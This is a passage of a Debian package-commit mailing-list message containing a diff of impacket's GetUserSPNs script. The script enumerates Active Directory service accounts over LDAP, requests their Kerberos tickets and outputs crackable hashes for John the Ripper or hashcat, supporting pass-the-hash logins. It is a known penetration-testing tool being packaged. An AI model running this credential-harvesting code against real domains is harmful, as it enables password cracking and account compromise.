+ domain = ccache.principal.realm['data']
+ else:
+ domain = self.__domain
+ logging.debug("Using Kerberos Cache: %s" % os.getenv('KRB5CCNAME'))
+ principal = 'krbtgt/%s@%s' % (domain.upper(), domain.upper())
+ creds = ccache.getCredential(principal)
+ if creds is not None:
+ TGT = creds.toTGT()
+ logging.debug('Using TGT from cache')
+ return TGT
+ else:
+ logging.debug("No valid credentials found in cache. ")
+
+ # No TGT in cache, request it
+ userName = Principal(self.__username, type=constants.PrincipalNameType.NT_PRINCIPAL.value)
+ tgt, cipher, oldSessionKey, sessionKey = getKerberosTGT(userName, self.__password, self.__domain,
+ unhexlify(self.__lmhash),
+ unhexlify(self.__nthash), self.__aesKey,
+ kdcHost=self.__kdcHost)
+ TGT = {}
+ TGT['KDC_REP'] = tgt
+ TGT['cipher'] = cipher
+ TGT['sessionKey'] = sessionKey
+
+ return TGT
+
+ def outputTGS(self, tgs, oldSessionKey, sessionKey, username, spn, fd=None):
+ decodedTGS = decoder.decode(tgs, asn1Spec=TGS_REP())[0]
+
+ # According to RFC4757 the cipher part is like:
+ # struct EDATA {
+ # struct HEADER {
+ # OCTET Checksum[16];
+ # OCTET Confounder[8];
+ # } Header;
+ # OCTET Data[0];
+ # } edata;
+ #
+ # In short, we're interested in splitting the checksum and the rest of the encrypted data
+ #
+ if decodedTGS['ticket']['enc-part']['etype'] == constants.EncryptionTypes.rc4_hmac.value:
+ entry = '$krb5tgs$%d$*%s$%s$%s*$%s$%s' % (
+ constants.EncryptionTypes.rc4_hmac.value, username, decodedTGS['ticket']['realm'], spn,
+ hexlify(str(decodedTGS['ticket']['enc-part']['cipher'][:16])),
+ hexlify(str(decodedTGS['ticket']['enc-part']['cipher'][16:])))
+ if fd is None:
+ print entry
+ else:
+ fd.write(entry+'\n')
+ else:
+ logging.error('Skipping %s/%s due to incompatible e-type %d' % (
+ decodedTGS['ticket']['sname']['name-string'][0], decodedTGS['ticket']['sname']['name-string'][1],
+ decodedTGS['ticket']['enc-part']['etype']))
+
+ if self.__saveTGS is True:
+ # Save the ticket
+ logging.debug('About to save TGS for %s' % username)
+ ccache = CCache()
+ try:
+ ccache.fromTGS(tgs, oldSessionKey, sessionKey )
+ ccache.saveFile('%s.ccache' % username)
+ except Exception, e:
+ logging.error(str(e))
+
+ def run(self):
+ if self.__doKerberos:
+ self.__target = self.getMachineName()
+ else:
+ if self.__kdcHost is not None:
+ self.__target = self.__kdcHost
+ else:
+ self.__target = self.__domain
+
+ # Connect to LDAP
+ try:
+ ldapConnection = ldap.LDAPConnection('ldap://%s'%self.__target, self.baseDN, self.__kdcHost)
+ if self.__doKerberos is not True:
+ ldapConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
+ else:
+ ldapConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,
+ self.__aesKey, kdcHost=self.__kdcHost)
+ except ldap.LDAPSessionError, e:
+ if str(e).find('strongerAuthRequired') >= 0:
+ # We need to try SSL
+ ldapConnection = ldap.LDAPConnection('ldaps://%s' % self.__target, self.baseDN, self.__kdcHost)
+ if self.__doKerberos is not True:
+ ldapConnection.login(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash)
+ else:
+ ldapConnection.kerberosLogin(self.__username, self.__password, self.__domain, self.__lmhash, self.__nthash,
+ self.__aesKey, kdcHost=self.__kdcHost)
+ else:
+ raise
+
+ # Building the following filter:
+ # (&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))
+
+ # (servicePrincipalName=*)
+ and0 = ldapasn1.Filter()
+ and0['present'] = ldapasn1.Present('servicePrincipalName')
+
+ # (UserAccountControl:1.2.840.113556.1.4.803:=512)
+ and1 = ldapasn1.Filter()
+ and1['extensibleMatch'] = ldapasn1.MatchingRuleAssertion()
+ and1['extensibleMatch']['matchingRule'] = ldapasn1.MatchingRuleId('1.2.840.113556.1.4.803')
+ and1['extensibleMatch']['type'] = ldapasn1.TypeDescription('UserAccountControl')
+ and1['extensibleMatch']['matchValue'] = ldapasn1.matchValueAssertion(UF_NORMAL_ACCOUNT)
+ and1['extensibleMatch']['dnAttributes'] = False
+
+ # !(UserAccountControl:1.2.840.113556.1.4.803:=2)
+ and2 = ldapasn1.Not()
+ and2['notFilter'] = ldapasn1.Filter()
+ and2['notFilter']['extensibleMatch'] = ldapasn1.MatchingRuleAssertion()
+ and2['notFilter']['extensibleMatch']['matchingRule'] = ldapasn1.MatchingRuleId('1.2.840.113556.1.4.803')
+ and2['notFilter']['extensibleMatch']['type'] = ldapasn1.TypeDescription('UserAccountControl')
+ and2['notFilter']['extensibleMatch']['matchValue'] = ldapasn1.matchValueAssertion(UF_ACCOUNTDISABLE)
+ and2['notFilter']['extensibleMatch']['dnAttributes'] = False
+
+ searchFilter = ldapasn1.Filter()
+ searchFilter['and'] = ldapasn1.And()
+ searchFilter['and'][0] = and0
+ searchFilter['and'][1] = and1
+ # searchFilter['and'][2] = and2
+ # Exception here, setting verifyConstraints to False so pyasn1 doesn't warn about incompatible tags
+ searchFilter['and'].setComponentByPosition(2,and2, verifyConstraints=False)
+
+ try:
+ resp = ldapConnection.search(searchFilter=searchFilter,
+ attributes=['servicePrincipalName', 'sAMAccountName',
+ 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],
+ sizeLimit=999)
+ except ldap.LDAPSearchError, e:
+ if e.getErrorString().find('sizeLimitExceeded') >= 0:
+ logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')
+ # We reached the sizeLimit, process the answers we have already and that's it. Until we implement
+ # paged queries
+ resp = e.getAnswers()
+ pass
+ else:
+ raise
+
+ answers = []
+ logging.debug('Total of records returned %d' % len(resp))
+
+ for item in resp:
+ if isinstance(item, ldapasn1.SearchResultEntry) is not True:
+ continue
+ mustCommit = False
+ sAMAccountName = ''
+ memberOf = ''
+ SPNs = []
+ pwdLastSet = ''
+ userAccountControl = 0
+ lastLogon = 'N/A'
+ try:
+ for attribute in item['attributes']:
+ if attribute['type'] == 'sAMAccountName':
+ if str(attribute['vals'][0]).endswith('$') is False:
+ # User Account
+ sAMAccountName = str(attribute['vals'][0])
+ mustCommit = True
+ elif attribute['type'] == 'userAccountControl':
+ userAccountControl = str(attribute['vals'][0])
+ elif attribute['type'] == 'memberOf':
+ memberOf = str(attribute['vals'][0])
+ elif attribute['type'] == 'pwdLastSet':
+ if str(attribute['vals'][0]) == '0':
+ pwdLastSet = '<never>'
+ else:
+ pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
+ elif attribute['type'] == 'lastLogon':
+ if str(attribute['vals'][0]) == '0':
+ lastLogon = '<never>'
+ else:
+ lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))
+ elif attribute['type'] == 'servicePrincipalName':
+ for spn in attribute['vals']:
+ SPNs.append(str(spn))
+
+ if mustCommit is True:
+ if int(userAccountControl) & UF_ACCOUNTDISABLE:
+ logging.debug('Bypassing disabled account %s ' % sAMAccountName)
+ else:
+ for spn in SPNs:
+ answers.append([spn, sAMAccountName,memberOf, pwdLastSet, lastLogon])
+ except Exception, e:
+ logging.error('Skipping item, cannot process due to error %s' % str(e))
+ pass
+
+ if len(answers)>0:
+ self.printTable(answers, header=[ "ServicePrincipalName", "Name", "MemberOf", "PasswordLastSet", "LastLogon"])
+ print '\n\n'
+
+ if self.__requestTGS is True:
+ # Let's get unique user names an a SPN to request a TGS for
+ users = dict( (vals[1], vals[0]) for vals in answers)
+
+ # Get a TGT for the current user
+ TGT = self.getTGT()
+ if self.__outputFileName is not None:
+ fd = open(self.__outputFileName, 'w+')
+ else:
+ fd = None
+ for user, SPN in users.iteritems():
+ try:
+ serverName = Principal(SPN, type=constants.PrincipalNameType.NT_SRV_INST.value)
+ tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, self.__domain,
+ self.__kdcHost,
+ TGT['KDC_REP'], TGT['cipher'],
+ TGT['sessionKey'])
+ self.outputTGS(tgs, oldSessionKey, sessionKey, user, SPN, fd)
+ except Exception , e:
+ logging.error(str(e))
+ if fd is not None:
+ fd.close()
+
+ else:
+ print "No entries found!"
+
+
+
+
+# Process command-line arguments.
+if __name__ == '__main__':
+ # Init the example's logger theme
+ logger.init()
+ print version.BANNER
+
+ parser = argparse.ArgumentParser(add_help = True, description = "Queries target domain for SPNs that are running under a user account")
+
+ parser.add_argument('target', action='store', help='domain/username[:password]')
+ parser.add_argument('-request', action='store_true', default='False', help='Requests TGS for users and output them in JtR/hashcat format (default False)')
+ parser.add_argument('-save', action='store_true', default='False', help='Saves TGS requested to disk. Format is <username>.ccache. Auto selects -request')
+ parser.add_argument('-outputfile', action='store',
+ help='Output filename to write ciphers in JtR/hashcat format')
+ parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')
+
+ group = parser.add_argument_group('authentication')
+
+ group.add_argument('-hashes', action="store", metavar = "LMHASH:NTHASH", help='NTLM hashes, format is LMHASH:NTHASH')
+ group.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
+ group.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on target parameters. If valid credentials cannot be found, it will use the ones specified in the command line')
+ group.add_argument('-aesKey', action="store", metavar = "hex key", help='AES key to use for Kerberos Authentication (128 or 256 bits)')
+ group.add_argument('-dc-ip', action='store',metavar = "ip address", help='IP Address of the domain controller. If ommited it use the domain part (FQDN) specified in the target parameter')
+
+ if len(sys.argv)==1:
+ parser.print_help()
+ sys.exit(1)
+
+ options = parser.parse_args()
+
+ if options.debug is True:
+ logging.getLogger().setLevel(logging.DEBUG)
+ else:
+ logging.getLogger().setLevel(logging.INFO)
+
+ import re
+ # This is because I'm lazy with regex
+ # ToDo: We need to change the regex to fullfil domain/username[:password]
+ targetParam = options.target+'@'
+ domain, username, password, address = re.compile('(?:(?:([^/@:]*)/)?([^@:]*)(?::([^@]*))?@)?(.*)').match(targetParam).groups('')
+
+ #In case the password contains '@'
+ if '@' in address:
+ password = password + '@' + address.rpartition('@')[0]
+ address = address.rpartition('@')[2]
+
+ if domain is '':
+ logging.critical('Domain should be specified!')
+ sys.exit(1)
+
+ if password == '' and username != '' and options.hashes is None and options.no_pass is False and options.aesKey is None:
... 56580 lines suppressed ...
--
Alioth's /usr/local/bin/git-commit-notice on /srv/git.debian.org/git/python-modules/packages/impacket.git
More information about the Python-modules-commits
mailing list